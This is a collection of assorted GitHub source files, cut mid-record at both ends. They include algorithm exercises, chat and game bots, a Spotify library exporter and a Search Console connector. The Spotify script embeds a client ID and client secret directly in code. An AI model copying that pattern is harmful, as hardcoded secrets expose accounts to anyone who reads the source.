0], kmeans.cluster_centers_[:,1], s = 100, c = 'black',marker = 'x', label = 'Centroids')\nplt.xlabel('SepalLengthCm')\nplt.ylabel('SepalWidthCm')\nplt.legend()\nplt.show()\n","repo_name":"pavels-k/My-algorithms","sub_path":"Machine_learning/kmeans++.py","file_name":"kmeans++.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34798783412","text":"\ndef subset(nums):\n output=[]\n def helper(start,temp,output):\n output+=[temp]\n for i in range(start,len(nums)):\n helper(i+1,temp+[nums[i]],output)\n helper(0,[],output)\n return output\n\n \n\n\n\n\n\nnums = [1,2]\n# nums=[1,2]\nprint(subset(nums))\n\n# Approch 2\n# def subset(nums):\n# output=[[]]\n# for i in nums:\n# for j in range(len(output)):\n# output.append([i]+[j])\n# print(output)\n\n# nums = [1,2,3]\n# subset(nums)\n\n# str=''\n# def subset(arr):\n \n# if len(arr)==1:\n# str+=str(arr)\n# else:\n# subset(arr[1:])\n# str+=str(arr)\n\n# print(str)\n\n\n\n\n# nums = [1,2,3,4,5,6]\n# subset(nums)\n# Output: [[],[1],[2],[1,2],[3],[1,3],[2,3],[1,2,3]]\n\n# out=[[],[1]]\n# for i in range(len(out)):\n# out.append(out[i]+[2])\n# print(out)\n# print(\"Amit\")\n","repo_name":"Amit151296/amitleetcode","sub_path":"myleetcode/subset.py","file_name":"subset.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41878255556","text":"\"\"\"\nGiven an unsorted array of integers nums, return the length of the longest consecutive elements sequence.\n\nYou must write an algorithm that runs in O(n) time.\n\n\n\nExample 1:\n\nInput: nums = [100,4,200,1,3,2]\nOutput: 4\nExplanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.\n\nExample 2:\n\nInput: nums = [0,3,7,2,5,8,4,6,0,1]\nOutput: 9\n\n\nConstraints:\n\n0 <= nums.length <= 10^5\n-10^9 <= nums[i] <= 10^9\n\"\"\"\nfrom typing import List\n\n\nclass Solution1:\n def longestConsecutive(self, nums: List[int]) -> int:\n result = 0\n _set = set(nums)\n for num in nums:\n if num - 1 not in _set:\n end = num + 1\n while end in _set:\n end += 1\n result = max(result, end - num)\n return result\n\n\nclass Solution2:\n class UnionFind:\n def __init__(self, n):\n self.__parent = [i for i in range(n)]\n self.__rank = [0] * n\n\n def find(self, x):\n if x == self.__parent[x]:\n return x\n self.__parent[x] = self.find(self.__parent[x])\n return self.__parent[x]\n\n def union(self, x1, x2):\n root1, root2 = self.find(x1), self.find(x2)\n if self.__rank[root1] < self.__rank[root2]:\n self.__parent[root1] = self.__parent[root2]\n else:\n self.__parent[root2] = self.__parent[root1]\n if self.__rank[root1] == self.__rank[root2]:\n self.__rank[root2] += 1\n\n def max_size(self):\n result = 0\n n = len(self.__parent)\n size = [0] * n\n for i in range(n):\n root = self.find(i)\n size[root] += 1\n result = max(result, size[root])\n return result\n\n def longestConsecutive(self, nums: List[int]) -> int:\n n = len(nums)\n if n == 0:\n return 0\n _dict = {}\n uf = self.UnionFind(n)\n for i, num in enumerate(nums):\n if num in _dict:\n continue\n _dict[num] = i\n if num - 1 in _dict:\n uf.union(_dict[num - 1], i)\n if num + 1 in _dict:\n uf.union(_dict[num + 1], i)\n return uf.max_size()\n","repo_name":"qianbinbin/leetcode","sub_path":"python3/leetcodepy/longest_consecutive_sequence.py","file_name":"longest_consecutive_sequence.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"15480728550","text":"import pynini\nfrom pynini.lib import pynutil\n\nfrom ukr.graph_utils import delete_space, GraphFst, delete_extra_space\nfrom ukr.taggers.cardinal import CardinalFst\nfrom ukr.taggers.date import DateFst\nfrom ukr.taggers.decimal import DecimalFst\nfrom ukr.taggers.measure import MeasureFst\nfrom ukr.taggers.money import MoneyFst\nfrom ukr.taggers.ordinal import OrdinalFst\nfrom ukr.taggers.time import TimeFst\nfrom ukr.taggers.word import WordFst\n\n\nclass ClassifyFst(GraphFst):\n\n def __init__(self):\n super().__init__(name=\"tokenize_and_classify\", kind=\"classify\")\n\n cardinal = CardinalFst()\n cardinal_graph = cardinal.fst\n\n ordinal = OrdinalFst(cardinal)\n ordinal_graph = ordinal.fst\n\n decimal = DecimalFst(cardinal)\n decimal_graph = decimal.fst\n\n measure_graph = MeasureFst(cardinal=cardinal, decimal=decimal).fst\n date_graph = DateFst(cardinal=cardinal, ordinal=ordinal).fst\n time_graph = TimeFst(cardinal=cardinal, ordinal=ordinal).fst\n word_graph = WordFst().fst\n money_graph = MoneyFst(cardinal=cardinal, decimal=decimal).fst\n\n classify = (\n pynutil.add_weight(decimal_graph, 1.1)\n | pynutil.add_weight(measure_graph, 1.1)\n | pynutil.add_weight(cardinal_graph, 1.1)\n | pynutil.add_weight(ordinal_graph, 1.1)\n | pynutil.add_weight(money_graph, 1.1)\n | pynutil.add_weight(date_graph, 1.1)\n | pynutil.add_weight(time_graph, 1.1)\n | pynutil.add_weight(word_graph, 100)\n )\n\n token = pynutil.insert(\"tokens { \") + classify + pynutil.insert(\" }\")\n\n graph = token + pynini.closure(delete_extra_space + token)\n graph = delete_space + graph + delete_space\n\n self.fst = graph.optimize()\n","repo_name":"lociko/ukraine_itn_wfst","sub_path":"ukr/taggers/tokenize_and_classify.py","file_name":"tokenize_and_classify.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"33165375146","text":"import asyncio\nimport random\nimport time\nimport os\nimport logging\nfrom bilibili_api import live\nfrom threading import Thread, Lock\nimport time\n\nimport start\n\nstart.get_default_info()\n\nimport wordpicker\nimport utils\nimport globaler as gl\nimport ffmpeg_cmd\n\n\n\nroom = live.LiveDanmaku(room_display_id=gl.room_id)\nlock = Lock()\ntime_last_pop = time.time()\n\n#主播放循环\nasync def music_player():\n while True:\n try:\n code, selected_music = choose_music()\n _, duration = await ffmpeg_cmd.get_vidoe_info(selected_music)\n time_point1 = time.time()\n logging.info(\"playing \" + selected_music + \" music_duration: \" + str(duration) + \" second\")\n if not os.path.exists('./video/' + selected_music + '.flv'):\n logging.warning(\"No music:\" + selected_music)\n continue\n await begin_live(selected_music)\n time_point2 = time.time()\n real_duration = time_point2 - time_point1\n\n while real_duration < 0.9 * float(duration):\n try:\n time_point1 = time.time()\n await ffmpeg_cmd.push_stream(selected_music, real_duration)\n time_point2 = time.time()\n real_duration = real_duration + time_point2 - time_point1\n except:\n break\n \n logging.info(\"music real play time: \" + str(real_duration))\n if code:\n with lock:\n gl.called_list.pop(0)\n\n if code:\n utils.delete_music(selected_music)\n except Exception as e:\n logging.error(e)\n break\n\n#开播\nasync def begin_live(music_name):\n try:\n logging.info(\"live start\")\n await ffmpeg_cmd.start_live(music_name)\n except Exception as e:\n logging.error(e)\n\n\n#点歌循环\n@room.on('DANMU_MSG')\nasync def call_list(event):\n with lock:\n code, music_name, usr_info = await wordpicker.analysis_danmuku(event)\n if code == -1:\n return 0\n if gl.check_music_name(music_name):\n with lock:\n await wordpicker.double_music_fault(usr_info)\n gl.clean_fault_music(music_name)\n return 0\n with lock:\n gl.download_list.append(music_name)\n task = video_composer(music_name, usr_info)\n asyncio.gather(task)\n\n\n#添加一首 music\nasync def add_music(music_name):\n with lock:\n gl.called_list.append(music_name)\n\n\n#音乐下载及封装\nasync def video_composer(music_name, usr_info):\n download_code, real_music_name = await wordpicker.music_downloader(music_name)\n if download_code == -1:\n await wordpicker.download_fault(usr_info, music_name)\n with lock:\n gl.clean_fault_music(music_name)\n return -1\n with lock:\n await wordpicker.success_danmuku(usr_info, music_name)\n video_compose_code, msg = await ffmpeg_cmd.make_video_2(music_name, real_music_name)\n if video_compose_code == -1:\n with lock:\n gl.clean_fault_music(music_name)\n print(\"video composer error : \" + str(msg))\n return -1\n print(\"video composer success\")\n \n count = 0\n while gl.download_list[0] != music_name:\n await asyncio.sleep(10)\n if gl.download_list[1] == music_name:\n count += 1\n if count == 30:\n pop_fist_music()\n count = 0\n\n await add_music(music_name)\n with lock:\n gl.download_list.pop(0)\n \n\n\n#选择下一个音乐\n#返回选择的 music_name\ndef choose_music():\n #print(gl.called_list)\n if not gl.called_list:\n num = random.randint(0, len(gl.default_list)-1)\n return 0, gl.default_list[num]\n else:\n with lock:\n res = gl.called_list[0];\n return 1, res\n\n#排除排队bug\ndef pop_fist_music():\n time_curr = time.time()\n if time_curr - time_last_pop > 300:\n with lock:\n gl.download_list.pop(0)\n time_last_pop = time_curr\n\n\nasync def tasks():\n #room = live.LiveDanmaku(gl.room_id)\n room_connect = room.connect()\n await asyncio.gather(room_connect)\n\ndef run_bili_loop():\n asyncio.run(tasks())\n #print(\"nice\")\n\ndef setup():\n t1 = Thread(target=run_bili_loop, args=())\n t1.start()\n asyncio.run(music_player())\n t1.join()\n\n\nif __name__ == \"__main__\":\n setup()\n\n","repo_name":"FruiteePro/BILI_Jukebox","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42067416269","text":"\"\"\"\nНапишите программу, которая бы считала по просьбе пользователя.\nНадо позволить пользователю ввести начало и конец счета, а также\nинтервал между называемыми целыми числами.\n\"\"\"\n\nfirst_number = int(input(\"Введите начало счета: \"))\nsecond_number = int(input(\"Введите конец счета: \"))\ninterval = int(input(\"Введите интервал счета: \"))\nfor i in range(first_number, second_number + 1, interval):\n print(i)\n","repo_name":"timerke/Dawson_Python_Programming","sub_path":"Chapter4/4.1.py","file_name":"4.1.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28855336004","text":"from aiogram import Router\nfrom aiogram.filters import Command, CommandStart, Text\nfrom aiogram.types import Message, CallbackQuery\nimport asyncio\n\nfrom keyboards.keyboard import game_mode_kb\n\nfrom keyboards.player_map_keyboard import player_keyboard_rebuild, player_game_kb, player_map_restore, confirm_player_kb\n\nfrom keyboards.keyboard_AI_pair import AI_pair_game_kb, rebuild_keyboard_AI_pair, rebuild_player_keyboard_AI_pair\n\nfrom lexicon.lexicon_ru import LEXICON_RU\nfrom services.sea_war import create_AI_map, shot_result, player_ship_placement, AI_shot\nfrom User_dict.user_dict import users\n\nrouter: Router = Router()\n\n\n# Этот хэндлер срабатывает на кнопки при размещении корабля\n@router.callback_query(Text(text=[str(i) + ',' + str(j) for i in range(1, 9) for j in range(1, 9)]))\nasync def process_game_button(callback: CallbackQuery):\n coords = callback.data.split(',')\n coord_y = int(coords[0])\n coord_x = int(coords[1])\n user = users[callback.from_user.id]\n # if the tile is not already marked, then mark it as a ship deck\n if [coord_y, coord_x] not in user['tiles'] and user['tiles_left'] > 0:\n status = 'place'\n user['tiles_left'] -= 1\n user['player_map'][coord_y][coord_x] = 1\n user['tiles'].append([coord_y, coord_x])\n await callback.message.edit_text(\n text=f\"{LEXICON_RU['tiles left']} = {user['tiles_left']}\",\n reply_markup=player_keyboard_rebuild(callback.message.reply_markup.inline_keyboard, coord_x, coord_y,\n status))\n\n # if the tile is already marked, then unmark it\n elif [coord_y, coord_x] in user['tiles']:\n status = 'empty'\n user['tiles_left'] += 1\n user['player_map'][coord_y][coord_x] = 0\n user['tiles'].remove([coord_y, coord_x])\n await callback.message.edit_text(\n text=f\"{LEXICON_RU['tiles left']} = {user['tiles_left']}\",\n reply_markup=player_keyboard_rebuild(callback.message.reply_markup.inline_keyboard,\n coord_x, coord_y, status))\n\n if user['tiles_left'] == 0:\n await callback.message.edit_text(\n text=LEXICON_RU['no_tiles_left'], reply_markup=callback.message.reply_markup)\n\n await callback.answer()\n\n\n# Этот хэндлер срабатывает на подтверждение расположения кораблей\n@router.callback_query(Text(text='confirm_placement'))\nasync def confirm_placement(callback: CallbackQuery):\n user = users[callback.from_user.id]\n # check the player ship placement:\n placement_check = player_ship_placement(user['player_ships'], user['player_map'])\n result = placement_check[0]\n # and if it is wrong, restore the map and tiles to set:\n if result == \"ship too long\":\n user['player_ships'] = {}\n user['tiles_left'] = 13\n user['player_map'], user['tiles'] = player_map_restore(user['player_map'], user['tiles'])\n await callback.message.edit_text(text=LEXICON_RU['ship_too_long'], reply_markup=player_game_kb)\n\n elif result == \"diagonal placement\":\n user['player_ships'] = {}\n user['tiles_left'] = 13\n user['player_map'], user['tiles'] = player_map_restore(user['player_map'], user['tiles'])\n await callback.message.edit_text(text=LEXICON_RU['diagonal_placement'],\n reply_markup=player_game_kb)\n\n elif result == \"wrong placement\":\n user['player_ships'] = {}\n user['tiles_left'] = 13\n user['player_map'], user['tiles'] = player_map_restore(user['player_map'], user['tiles'])\n await callback.message.edit_text(text=LEXICON_RU['wrong_placement'],\n reply_markup=player_game_kb)\n\n elif result == \"placement confirmed\":\n print(user['player_ships'])\n # replace confirmation button with the next move button and make tiles inactive:\n user['player_kb'] = confirm_player_kb(user['player_map'])\n\n # go to enemy map:\n user['enemy_kb'] = AI_pair_game_kb\n await callback.message.edit_text(text=LEXICON_RU['placement_confirmed'],\n reply_markup=user['enemy_kb'])\n\n await callback.answer()\n\n\n# Этот хэндлер срабатывает на кнопки стрельбы по карте компьютерного игрока\n@router.callback_query(Text(text=['AI_pair,' + str(i) + ',' + str(j) for i in range(1, 9) for j in range(1, 9)]))\nasync def process_AI_pair_button(callback: CallbackQuery):\n user = users[callback.from_user.id]\n if user['shot_status'] == 'not_shot_yet':\n coords = callback.data.split(',')\n coord_y = int(coords[1])\n coord_x = int(coords[2])\n\n AI_map = user['AI_map']\n player_hits = user['player_hits']\n\n # check the result of player shot:\n result = shot_result(AI_map[0], AI_map[1], player_hits, coord_x, coord_y)\n\n if result == 'killed':\n user['enemy_ships_left'] -= 1\n if user['enemy_ships_left'] == 0:\n await callback.message.edit_text(\n text=LEXICON_RU['user_won'],\n reply_markup=None)\n user['wins'] += 1\n user['in_game'] = False\n await callback.message.answer(text=LEXICON_RU['new_game'], reply_markup=game_mode_kb)\n\n else:\n user['enemy_kb'] = rebuild_keyboard_AI_pair(callback.message.reply_markup.inline_keyboard, coord_x, coord_y,\n result)\n await callback.message.edit_text(\n text=LEXICON_RU[result], reply_markup=user['enemy_kb'])\n user['shot_status'] = 'already_shot'\n else:\n await callback.message.edit_text(\n text=LEXICON_RU['inactive_button'], reply_markup=callback.message.reply_markup)\n\n await callback.answer()\n\n\n# Этот хэндлер срабатывает на кнопку перехода к следующему ходу\n@router.callback_query(Text(text='next_move_AI'))\nasync def go_to_AI_move(callback: CallbackQuery):\n user = users[callback.from_user.id]\n user['shot_status'] = 'not_shot_yet'\n # go to player map:\n await callback.message.edit_text(text='Мой ход', reply_markup=user['player_kb'])\n await asyncio.sleep(2)\n AI_shot_result = AI_shot(user['AI_tiles_for_shot'], user['AI_hits'], user['player_map'], user['player_ships'])\n AI_x = AI_shot_result[0]\n AI_y = AI_shot_result[1]\n AI_result = AI_shot_result[2]\n user['AI_tiles_for_shot'] = AI_shot_result[3]\n user['AI_hits'] = AI_shot_result[4]\n user['player_kb'] = rebuild_player_keyboard_AI_pair(user['player_kb'].inline_keyboard,\n AI_x, AI_y, AI_result)\n if AI_result == 'killed_player':\n user['player_ships_left'] -= 1\n if user['player_ships_left'] == 0:\n await callback.message.edit_text(\n text=LEXICON_RU['user_failed'],\n reply_markup=None)\n user['in_game'] = False\n await callback.message.answer(text=LEXICON_RU['new_game'], reply_markup=game_mode_kb)\n else:\n await callback.message.edit_text(text=LEXICON_RU[AI_result], reply_markup=user['player_kb'])\n\n await callback.answer()\n\n\n# Этот хэндлер срабатывает на кнопку перехода к следующему ходу\n@router.callback_query(Text(text='next_move_player'))\nasync def confirm_placement(callback: CallbackQuery):\n user = users[callback.from_user.id]\n # go to enemy map:\n await callback.message.edit_text(text='Ваш ход', reply_markup=user['enemy_kb'])\n await callback.answer()\n\n\n# Этот хэндлер срабатывает на нажатие на неактивную кнопку карты игрока\n@router.callback_query(Text(text=['inactive,' + str(i) + ',' + str(j) for i in range(1, 9) for j in range(1, 9)]))\nasync def note_inactive_button(callback: CallbackQuery):\n await callback.message.edit_text(\n text=LEXICON_RU['inactive_button'], reply_markup=callback.message.reply_markup)\n\n await callback.answer()\n","repo_name":"tanypredator/Sea_war_bot","sub_path":"handlers/pair_AI_handlers.py","file_name":"pair_AI_handlers.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17367809370","text":"# Leetcode\n# 1823. Find the Winner of the Circular Game\n\nclass Solution:\n def findTheWinner(self, n: int, k: int) -> int:\n # create a double ended queue object \n # rotate the queue to the left\n # negative number rotates the queue to the left \n # pop last element\n elements = collections.deque([x for x in range(1, n+1)])\n # print(elements)\n while len(elements) > 1:\n elements.rotate(-k)\n # print(elements)\n elements.pop()\n return elements.pop()\n","repo_name":"ayeshsalah/coding-interview-prep","sub_path":"leetcode/FindTheWinnerOfTheCircularGame.py","file_name":"FindTheWinnerOfTheCircularGame.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23489108898","text":"# -*- codong: utf-8 -*-\n\nfile = input('Введите путь к текстовому файлу: ')\nabc = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\ncounter =dict()\nwith open(file, \"r\") as f_in:\n txt = f_in.read()\n total = 0\n for item in abc:\n cnt = txt.count(item)\n if item.lower() in counter: \n counter[item.lower()]+= cnt\n else:\n counter[item.lower()]= cnt\n total += cnt\n\nfor ltr in counter:\n print(f\"{ltr} - {counter[ltr]*100/total:2.2f}%\")\n","repo_name":"paladinum/dztst1","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38891527038","text":"from bottle import route, run, request\nimport spotipy\nfrom spotipy import oauth2\nimport pprint\nimport json\n\nPORT_NUMBER = 8080\nSPOTIPY_CLIENT_ID = '550663057de643b78fc270e67cdfaa49'\nSPOTIPY_CLIENT_SECRET = '0f92dd717f5c4d3eb5713ff6b0c6462f'\nSPOTIPY_REDIRECT_URI = 'http://localhost:8080'\nSCOPE = 'user-library-read' #change this for scope\nCACHE = '.spotipyoauthcache'\nUSERNAME = 'Grant'\nNUM_SAVED_TRACKS = 9000\n\nsp_oauth = oauth2.SpotifyOAuth( SPOTIPY_CLIENT_ID, SPOTIPY_CLIENT_SECRET,SPOTIPY_REDIRECT_URI,scope=SCOPE,cache_path=CACHE )\n\npp = pprint.PrettyPrinter(indent=4)\n\n@route('/')\ndef index():\n\n access_token = \"\"\n\n token_info = sp_oauth.get_cached_token()\n\n if token_info:\n print (\"Found cached token!\")\n access_token = token_info['access_token']\n else:\n url = request.url\n code = sp_oauth.parse_response_code(url)\n if code:\n print (\"Found Spotify auth code in Request URL! Trying to get valid access token...\")\n token_info = sp_oauth.get_access_token(code)\n access_token = token_info['access_token']\n\n if access_token:\n print(\"Access token available! Trying to get user information...\")\n sp = spotipy.Spotify(auth=access_token)\n\n #all_artists = []\n #all_artists += results['items']\n all_tracks = []\n for i in range(0, NUM_SAVED_TRACKS, 50):\n results = sp.current_user_saved_tracks(limit=50, offset=i)\n if results is None:\n break\n all_tracks += results['items']\n #for item in results['items']:\n # all_tracks += item['track']\n #pp.pprint(all_tracks)\n\n #artists = []\n #for item in all_artists:\n # artists.append(item['name'])\n #pp.pprint(artists)\n \n #with open('librarySongs' + USERNAME, 'w') as fout:\n # json.dump(all_artists, fout)\n num_tracks = len(all_tracks)\n print(num_tracks)\n with open('librarySongs' + USERNAME+'_'+str(num_tracks), 'w') as fout:\n json.dump(all_tracks, fout)\n\n return \"
    \" + json.dumps(results, indent=4) + \"
    \"\n\n #print(len(all_artists))\n\n '''\n sp.trace = False\n ranges = ['short_term', 'medium_term', 'long_term']\n for myrange in ranges:\n print (\"range:\", myrange)\n results = sp.current_user_top_tracks(time_range=myrange, limit=50)\n for i, item in enumerate(results['items']):\n print (i, item['name'], '//', item['artists'][0]['name'])\n print()\n '''\n \n\n else:\n return htmlForLoginButton()\n\ndef htmlForLoginButton():\n auth_url = getSPOauthURI()\n htmlLoginButton = \"Login to Spotify\"\n return htmlLoginButton\n\ndef getSPOauthURI():\n auth_url = sp_oauth.get_authorize_url()\n return auth_url\n\nrun(host='', port=8080)\n\n\n","repo_name":"edd426/music-in-common","sub_path":"test_scripts/getLibraryData.py","file_name":"getLibraryData.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41381057391","text":"#for Dataiku\nfrom dataiku.connector import Connector\n#for Dataframes\nimport pandas as pd \n#Datetime tools\nfrom datetime import date\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os #to read files\nimport json #to manipulate json \n#for Google Search Console Reporting API V3 with service account\nfrom apiclient.discovery import build #from google-api-python-client\nfrom oauth2client.service_account import ServiceAccountCredentials #to use a Google Service \n\n#my Connector Class\nclass MyConnector(Connector):\n\n def __init__(self, config, plugin_config):\n \"\"\"\n The configuration parameters set up by the user in the settings tab of the\n dataset are passed as a json object 'config' to the constructor.\n The static configuration parameters set up by the developer in the optional\n file settings.json at the root of the plugin directory are passed as a json\n object 'plugin_config' to the constructor\n \"\"\"\n Connector.__init__(self, config, plugin_config) # pass the parameters to the base class\n\n \n #perform some more initialization\n SCOPES = ['https://www.googleapis.com/auth/webmasters.readonly']\n #DISCOVERY_URI = ('https://www.googleapis.com/discovery/v1/apis/customsearch/v1/rest') #not used \n\n\n #Plugin parameters (declare in plugin.json )\n self.credentials = self.plugin_config.get(\"credentials\") \n self.webSite = self.plugin_config.get(\"webSite\")\n #Component parameters (deckare in connector.json)\n \n self.period = self.config.get(\"period\")\n print(self.period)\n if (self.period==\"1day\") :\n self.from_date = date.today() - timedelta(days=2)\n self.to_date = date.today() - timedelta(days=1)\n if (self.period==\"7days\") :\n self.from_date = date.today() - timedelta(days=8)\n self.to_date = date.today() - timedelta(days=1)\n if (self.period==\"28days\") :\n self.from_date = date.today() - timedelta(days=29)\n self.to_date = date.today() - timedelta(days=1) \n if (self.period==\"3months\") :\n self.from_date = date.today() - timedelta(days=30*3)\n self.to_date = date.today() - timedelta(days=1) \n if (self.period==\"6months\") :\n self.from_date = date.today() - timedelta(days=30*6)\n self.to_date = date.today() - timedelta(days=1) \n if (self.period==\"12months\") :\n self.from_date = date.today() - timedelta(days=30*12)\n self.to_date = date.today() - timedelta(days=1) \n if (self.period==\"16months\") :\n self.from_date = date.today() - timedelta(days=30*16)\n self.to_date = date.today() - timedelta(days=1) \n if (self.period==\"Personalized\") :\n #beware !! dates are in string in the forms, and there is a shift error of one minus day\n self.from_date = datetime.strptime( self.config.get(\"from_date\")[:10], '%Y-%m-%d')\n #avoid shift error\n self.from_date = self.from_date + timedelta(days=1) \n \n self.to_date = datetime.strptime( self.config.get(\"to_date\")[:10], '%Y-%m-%d')\n #avoid shift error\n self.to_date = self.to_date + timedelta(days=1) \n \n if self.to_date < self.from_date:\n raise ValueError(\"The end date occurs before the start date\") \n \n #get JSON Service account credentials from file or from text \n file = self.credentials.splitlines()[0]\n if os.path.isfile(file):\n try:\n with open(file, 'r') as f:\n self.credentials = json.load(f)\n f.close()\n except Exception as e:\n raise ValueError(\"Unable to read the JSON Service Account from file '%s'.\\n%s\" % (file, e))\n else:\n try:\n self.credentials = json.loads(self.credentials)\n except Exception as e:\n raise Exception(\"Unable to read the JSON Service Account.\\n%s\" % e)\n \n #get credentials from service account\n credentials = ServiceAccountCredentials.from_json_keyfile_dict(self.credentials, SCOPES)\n\n #open a Google Search console service (previously called Google Webmasters tools)\n self.webmasters_service = build('webmasters', 'v3', credentials=credentials)\n\n \n \n\n def get_read_schema(self):\n \"\"\"\n Returns the schema that this connector generates when returning rows.\n\n The returned schema may be None if the schema is not known in advance.\n In that case, the dataset schema will be infered from the first rows.\n\n If you do provide a schema here, all columns defined in the schema\n will always be present in the output (with None value),\n even if you don't provide a value in generate_rows\n\n The schema must be a dict, with a single key: \"columns\", containing an array of\n {'name':name, 'type' : type}.\n\n Example:\n return {\"columns\" : [ {\"name\": \"col1\", \"type\" : \"string\"}, {\"name\" :\"col2\", \"type\" : \"float\"}]}\n\n Supported types are: string, int, bigint, float, double, date, boolean\n \"\"\"\n\n # In this example, we don't specify a schema here, so DSS will infer the schema\n # from the columns actually returned by the generate_rows method\n return None\n \n\n def generate_rows(self, dataset_schema=None, dataset_partitioning=None,\n partition_id=None, records_limit = -1):\n \"\"\"\n The main reading method.\n\n Returns a generator over the rows of the dataset (or partition)\n Each yielded row must be a dictionary, indexed by column name.\n\n The dataset schema and partitioning are given for information purpose.\n \"\"\"\n \n \n print (\"Google Search Console plugin - Start generating rows\")\n print (\"Google Search Console plugin - records_limits=%i\" % records_limit)\n\n\n ###############################################################################\n #Get Data Pages/Queries/positions/Clicks from Google Search Console\n ###############################################################################\n\n dfAllTraffic = pd.DataFrame() #global dataframe for all traffic calculation\n dfGSC = pd.DataFrame() #global dataframe for clicks\n #convert dates in strings\n myStrStartDate = self.from_date.strftime('%Y-%m-%d') \n myStrEndDate = self.to_date.strftime('%Y-%m-%d') \n\n \n ####### Get Global Traffic ##############\n\n \n maxStartRow = 1000000000 #to avoid infinite loop\n myStartRow = 0\n \n \n \n while ( myStartRow < maxStartRow):\n \n df = pd.DataFrame() #dataframe for this loop\n \n \n mySiteUrl = self.plugin_config.get(\"webSite\")\n myRequest = {\n 'startDate': myStrStartDate, #older date\n 'endDate': myStrEndDate, #most recent date\n 'dimensions': [\"date\", \"country\", \"device\"],\n 'searchType': 'web', #for the moment only Web \n 'rowLimit': 25000, #max 25000 for one Request \n \"aggregationType\": \"byPage\",\n 'startRow' : myStartRow # for multiple resquests 'startRow':\n }\n\n response = self.webmasters_service.searchanalytics().query(siteUrl=mySiteUrl, body=myRequest).execute()\n\n\n \n #set response (dict) in DataFrame for treatments purpose.\n df = pd.DataFrame.from_dict(response['rows'], orient='columns')\n\n if ( myStartRow == 0) :\n dfAllTraffic = df #save the first loop df in global df\n else :\n dfAllTraffic = pd.concat([dfAllTraffic, df], ignore_index=True) #concat this loop df with global df\n\n if (df.shape[0]==25000) :\n myStartRow += 25000 #continue\n else :\n myStartRow = maxStartRow+1 #stop\n \n #split keys in date country device\n dfAllTraffic[[\"date\", \"country\", \"device\"]] = pd.DataFrame(dfAllTraffic[\"keys\"].values.tolist())\n dfAllTraffic = dfAllTraffic.drop(columns=['keys']) #remove Keys (not used)\n \n myTotalClicks = dfAllTraffic['clicks'].sum()\n myTotalImpressions = dfAllTraffic['impressions'].sum()\n \n \n \n ####### Get Pages/Queries/positions/Clicks ##############\n \n maxStartRow = 1000000000 #to avoid infinite loop\n myStartRow = 0\n \n \n \n while ( myStartRow < maxStartRow):\n \n df = pd.DataFrame() #dataframe for this loop\n \n \n mySiteUrl = self.plugin_config.get(\"webSite\")\n myRequest = {\n 'startDate': myStrStartDate, #older date\n 'endDate': myStrEndDate, #most recent date\n 'dimensions': [\"date\", \"query\",\"page\",\"country\",\"device\"], #all available dimensions ?\n 'searchType': 'web', #for the moment only Web \n 'rowLimit': 25000, #max 25000 for one Request \n 'startRow' : myStartRow # for multiple resquests 'startRow':\n }\n\n response = self.webmasters_service.searchanalytics().query(siteUrl=mySiteUrl, body=myRequest).execute()\n\n\n \n #set response (dict) in DataFrame for treatments purpose.\n df = pd.DataFrame.from_dict(response['rows'], orient='columns')\n\n if ( myStartRow == 0) :\n dfGSC = df #save the first loop df in global df\n else :\n dfGSC = pd.concat([dfGSC, df], ignore_index=True) #concat this loop df with global df\n\n if (df.shape[0]==25000) :\n myStartRow += 25000 #continue\n else :\n myStartRow = maxStartRow+1 #stop\n \n #split keys in date query page country device\n dfGSC[[\"date\", \"query\", \"page\", \"country\", \"device\"]] = pd.DataFrame(dfGSC[\"keys\"].values.tolist())\n dfGSC = dfGSC.drop(columns=['keys']) #remove Keys (not used)\n \n \n mySampleClicks = dfGSC['clicks'].sum()\n mySampleImpressions = dfGSC['impressions'].sum()\n \n \n #Recalculate new clicks and Impressions\n #recalculate All Clicks according to clicks volume ratio (we privilegiate clicks accuracy)\n dfGSC['allClicks'] = dfGSC.apply(lambda x : round((x['clicks']*myTotalClicks)/mySampleClicks, 0),axis=1)\n #Recalculate news All Impressions according to clicks volume ratio\n dfGSC['allImpressions'] = dfGSC.apply(lambda x : round((x['impressions']*myTotalClicks)/mySampleClicks, 0),axis=1) \n #Reclaculate news All ctr according to new All impressions and Clicks\n dfGSC['allCTR'] = dfGSC.apply(lambda x : x['allClicks']/x['allImpressions'],axis=1) \n \n #remove bad dates \n #Change string date in datetime\n dfGSC['date'] = dfGSC.apply(lambda x : datetime.strptime( x['date'][:10], '%Y-%m-%d'),axis=1) \n mask = (dfGSC['date'] >= self.from_date) & (dfGSC['date'] <= self.to_date)\n dfGSC = dfGSC.loc[mask] \n dfGSC.reset_index(inplace=True, drop=True) #reset index\n \n #remove old clicks, ctr and impression columns\n dfGSC = dfGSC.drop(columns=['clicks', 'ctr', 'impressions'])\n #rename All impressions, ctr and clicks in old names\n dfGSC.rename(columns={'allImpressions':'impressions', 'allClicks':'clicks', 'allCTR':'ctr'}, inplace=True)\n \n #reorganise 